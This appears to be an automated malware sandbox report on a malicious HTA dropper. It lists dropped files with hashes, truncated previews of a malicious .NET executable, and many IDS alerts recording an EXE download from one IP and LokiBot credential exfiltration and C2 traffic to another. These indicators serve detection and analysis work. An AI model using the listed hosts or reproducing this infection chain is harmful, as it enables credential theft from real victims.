                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):867
                                                                                                                              Entropy (8bit):5.3132100024069615
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:KJBqd3ka6KRfsmEifsJKax5DqBVKVrdFAMBJTH:Cika6CsmEusJK2DcVKdBJj
                                                                                                                              MD5:FD399C8EBF0169227C552DFEC86B62D3
                                                                                                                              SHA1:38E9A72FCC5D519C40B09F8CD6F9783DD530B67F
                                                                                                                              SHA-256:948161BE405C53308872E3B996E8C603D69A9FF55CD54EB201DA4E2691E733FD
                                                                                                                              SHA-512:E0C1B4C93344AF2DC4E00DB1167F69B28B2E04DA9D0A08DEB6A9792590FC76AEA1952A667B891808B335913EA512943B27D87B47C3D1DC9C97A2F9C785D8DE8F
                                                                                                                              Malicious:false
                                                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                              Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):600576
                                                                                                                              Entropy (8bit):7.913749036393697
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                                                                                              MD5:66B03D1AFF27D81E62B53FC108806211
                                                                                                                              SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                                                                                              SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                                                                                              SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                                                                                              Malicious:true
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: PO-000041492.docx.doc, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                                                                              Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview:1
                                                                                                                              Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              File Type:data
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):46
                                                                                                                              Entropy (8bit):1.0424600748477153
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:/lbq:4
                                                                                                                              MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                                                                                                              SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                                                                                                              SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                                                                                                              SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                                                                                                              Malicious:false
                                                                                                                              Preview:........................................user.
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):600576
                                                                                                                              Entropy (8bit):7.913749036393697
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                                                                                              MD5:66B03D1AFF27D81E62B53FC108806211
                                                                                                                              SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                                                                                              SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                                                                                              SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):55
                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                              Malicious:false
                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                              File type:HTML document, ASCII text, with very long lines (23388), with CRLF line terminators
                                                                                                                              Entropy (8bit):1.6848932886813717
                                                                                                                              TrID:
                                                                                                                              • HyperText Markup Language (15015/1) 100.00%
                                                                                                                              File name:goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
                                                                                                                              File size:23'556 bytes
                                                                                                                              MD5:ec0d423a3f72d69975a1e31a275f5377
                                                                                                                              SHA1:213922fb8456ecaadc24889afec1ac6ef5010c68
                                                                                                                              SHA256:9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
                                                                                                                              SHA512:8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
                                                                                                                              SSDEEP:96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
                                                                                                                              TLSH:BFB2758F0E61BC09EB9238FBD1CC80D6909C5FB9C1952A6571EC1AC5078253D5CE11DF
                                                                                                                              File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<ScRipT LANGuagE="vBscRIpT">..DIm...............................................................................................................................
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-11-20T10:57:05.601815+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1166.63.187.23180192.168.2.449730TCP
                                                                                                                              2024-11-20T10:57:05.742219+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2166.63.187.23180192.168.2.449730TCP
                                                                                                                              2024-11-20T10:57:12.808002+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:12.808002+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:12.808002+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:13.563784+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:13.757343+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:13.757343+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:13.757343+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:14.904339+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:15.026901+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:15.026901+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:15.026901+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:15.973269+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:15.973269+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:15.987856+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449737TCP
                                                                                                                              2024-11-20T10:57:16.128443+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:16.128443+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:16.128443+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:16.996278+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:16.996278+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:17.006051+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449739TCP
                                                                                                                              2024-11-20T10:57:17.172162+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:17.172162+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:17.172162+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:17.928297+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:17.928297+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:17.936080+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449740TCP
                                                                                                                              2024-11-20T10:57:18.095135+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:18.095135+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:18.095135+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:18.827777+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:18.827777+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:18.832714+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449742TCP
                                                                                                                              2024-11-20T10:57:19.188469+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:19.188469+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:19.188469+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:19.860877+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:19.860877+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:19.868969+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449746TCP
                                                                                                                              2024-11-20T10:57:20.015773+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:20.015773+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:20.015773+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:20.941871+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:20.941871+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:20.949030+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449748TCP
                                                                                                                              2024-11-20T10:57:21.098851+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:21.098851+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:21.098851+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:21.966321+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:21.966321+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:21.975270+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449750TCP
                                                                                                                              2024-11-20T10:57:22.128961+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:22.128961+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:22.128961+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:22.899768+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:22.899768+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:22.904758+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449751TCP
                                                                                                                              2024-11-20T10:57:23.051375+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:23.051375+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:23.051375+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:23.803116+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:23.803116+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:23.808026+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449752TCP
                                                                                                                              2024-11-20T10:57:23.952106+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:23.952106+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:23.952106+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:24.685646+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:24.685646+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:24.690524+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449753TCP
                                                                                                                              2024-11-20T10:57:24.855713+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:24.855713+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:24.855713+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:25.787244+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:25.787244+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:25.795228+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449754TCP
                                                                                                                              2024-11-20T10:57:25.934109+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:25.934109+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:25.934109+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:26.822818+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:26.822818+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:26.827906+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449755TCP
                                                                                                                              2024-11-20T10:57:26.983156+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:26.983156+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:26.983156+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:27.739805+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:27.739805+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:27.744857+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449756TCP
                                                                                                                              2024-11-20T10:57:27.893409+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:27.893409+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:27.893409+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:28.632253+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:28.632253+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:28.642340+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449757TCP
                                                                                                                              2024-11-20T10:57:28.799350+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:28.799350+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:28.799350+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:29.544680+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:29.544680+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:29.549556+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449758TCP
                                                                                                                              2024-11-20T10:57:29.726326+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:29.726326+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:29.726326+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:30.509633+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:30.509633+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:30.514533+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449759TCP
                                                                                                                              2024-11-20T10:57:30.667112+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:30.667112+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:30.667112+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:31.416743+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:31.416743+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:31.425324+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449760TCP
                                                                                                                              2024-11-20T10:57:31.597321+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:31.597321+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:31.597321+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:32.379994+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:32.379994+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:32.385510+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449761TCP
                                                                                                                              2024-11-20T10:57:32.534728+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:32.534728+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:32.534728+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:33.635907+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:33.635907+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:33.640881+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449762TCP
                                                                                                                              2024-11-20T10:57:33.800604+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:33.800604+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:33.800604+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:34.562494+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:34.562494+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:34.567581+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449763TCP
                                                                                                                              2024-11-20T10:57:34.722224+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45848994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:34.722224+01002025381ET MALWARE LokiBot Checkin1192.168.2.45848994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:34.722224+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45848994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:35.466504+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45848994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:35.466504+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45848994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:35.471497+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458489TCP
                                                                                                                              2024-11-20T10:57:35.630460+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45849194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:35.630460+01002025381ET MALWARE LokiBot Checkin1192.168.2.45849194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:35.630460+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45849194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:36.395872+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45849194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:36.395872+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45849194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:36.400812+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458491TCP
                                                                                                                              2024-11-20T10:57:36.546091+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45849294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:36.546091+01002025381ET MALWARE LokiBot Checkin1192.168.2.45849294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:36.546091+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45849294.156.177.4180TCP
